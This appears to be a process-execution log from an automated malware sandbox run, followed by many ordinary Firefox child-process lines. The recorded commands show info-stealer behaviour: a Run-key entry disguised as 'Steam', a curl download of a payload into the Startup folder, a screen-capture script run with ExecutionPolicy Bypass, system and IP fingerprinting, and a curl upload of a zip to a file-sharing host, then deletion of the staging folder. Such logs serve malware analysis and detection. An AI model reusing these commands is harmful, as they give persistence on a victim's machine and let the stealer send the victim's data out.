C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.0.27215710\1063592625" -parentBuildID 20230214051806 -prefsHandle 1784 -prefMapHandle 1524 -prefsLen 22035 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0f4faf4-c264-47bd-a90e-2797bec149ab} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1864 2185e010b58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.1.563846262\1015350981" -parentBuildID 20230214051806 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 22071 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dce366c9-7079-4437-ba10-bb03c3f54416} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 2388 2185128ab58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.2.255791635\1987724925" -childID 1 -isForBrowser -prefsHandle 2984 -prefMapHandle 3000 -prefsLen 22109 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e72fce61-b52a-46b4-b7e5-f15a0025f959} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 2992 218608f1058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.3.757256289\1805141213" -childID 2 -isForBrowser -prefsHandle 3368 -prefMapHandle 3364 -prefsLen 27575 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63d11a16-7847-40f5-a7d5-a946bdea539a} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 3568 218634c4758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.4.897920699\1156673394" -childID 3 -isForBrowser -prefsHandle 5148 -prefMapHandle 5144 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43f4c757-817d-4f76-bc3c-559e0be7ca4f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 5104 21865544d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.5.62187172\1927483691" -childID 4 -isForBrowser -prefsHandle 5376 -prefMapHandle 5372 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6e05c4b-2c2a-4778-b980-25d7577bdd7d} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 5384 2186601a858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.6.1602546119\2133810384" -childID 5 -isForBrowser -prefsHandle 5280 -prefMapHandle 5284 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5203dbc1-8cc1-4f8e-9558-e384b16fde3f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 5528 2186601ab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.7.186091430\1478116529" -childID 6 -isForBrowser -prefsHandle 5900 -prefMapHandle 5896 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94cc6ce3-37cd-4b54-b776-b435d46f2b96} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 5912 21867839858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.8.1041450222\834470622" -childID 7 -isForBrowser -prefsHandle 6188 -prefMapHandle 6168 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7102e2a-3cb4-419b-9131-c64274957903} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6196 21867eb3658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.9.1142723999\537138823" -childID 8 -isForBrowser -prefsHandle 6424 -prefMapHandle 6420 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b3d817d-904e-4cf2-9022-3722438ae352} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6432 21867eb3958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.10.577266884\2139491012" -childID 9 -isForBrowser -prefsHandle 4872 -prefMapHandle 5164 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ecaf769-7fd3-4d1b-a7fd-df969765243f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6092 218678aee58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.11.1882175982\1875369577" -childID 10 -isForBrowser -prefsHandle 6100 -prefMapHandle 6120 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6481f5a1-52ec-456a-9b3d-b3d6f9b100f4} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1380 2185d333e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.12.537696255\2011888696" -childID 11 -isForBrowser -prefsHandle 10660 -prefMapHandle 10648 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae7021ad-ee51-4aa5-997a-ded1e94e61e0} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 10664 21864f8ed58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.13.825371457\626011255" -childID 12 -isForBrowser -prefsHandle 10336 -prefMapHandle 10328 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc5c2dac-3d62-4472-a6f7-67b3362dc8d5} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 10344 21867cbfa58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.14.1760758338\24432413" -childID 13 -isForBrowser -prefsHandle 4324 -prefMapHandle 6032 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {711f6e68-28ee-43e7-9c96-2f95e2a4bc78} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6224 2185d331158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.15.1370978413\1158419792" -childID 14 -isForBrowser -prefsHandle 4928 -prefMapHandle 10504 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b1818ac-09ac-498e-83f4-0e7554657154} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6424 2185d332058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.16.479201886\1345818582" -childID 15 -isForBrowser -prefsHandle 6092 -prefMapHandle 10460 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9a27e29-75d9-492c-a88d-889a94861ff9} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 9928 218608cbb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.17.563355609\693325475" -childID 16 -isForBrowser -prefsHandle 6036 -prefMapHandle 4824 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f4ec1e0-9195-4f11-8f75-3cd69345557d} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6168 21867eb2d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.18.554141052\1468241636" -childID 17 -isForBrowser -prefsHandle 5904 -prefMapHandle 10304 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9977f278-853c-40a7-adc9-009ff6630eca} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 9888 21867eb4858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.19.1986547475\1769153122" -childID 18 -isForBrowser -prefsHandle 11008 -prefMapHandle 11044 -prefsLen 31299 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8da9614b-87bf-432b-bcf3-270cc69dc33b} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 11020 2186e03b658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.20.955464574\90668214" -childID 19 -isForBrowser -prefsHandle 11240 -prefMapHandle 11248 -prefsLen 31299 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51d7d574-d6b5-4430-bbb8-28c4796fd21a} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 11024 2186e067458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.21.117201389\1211368958" -childID 20 -isForBrowser -prefsHandle 10012 -prefMapHandle 10028 -prefsLen 31299 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd0e1ec7-6b2f-439f-bfc4-9b7392746313} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 10008 21866323958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.22.1425546929\837102885" -childID 21 -isForBrowser -prefsHandle 10048 -prefMapHandle 10060 -prefsLen 31308 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de295e9f-d2da-4bc2-9404-4356f0e5ad5a} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 9800 2185d430558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.23.69807367\257329591" -childID 22 -isForBrowser -prefsHandle 11036 -prefMapHandle 11116 -prefsLen 31308 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59208cbf-f280-40ac-9796-157c1a774262} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 11100 218679c7d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

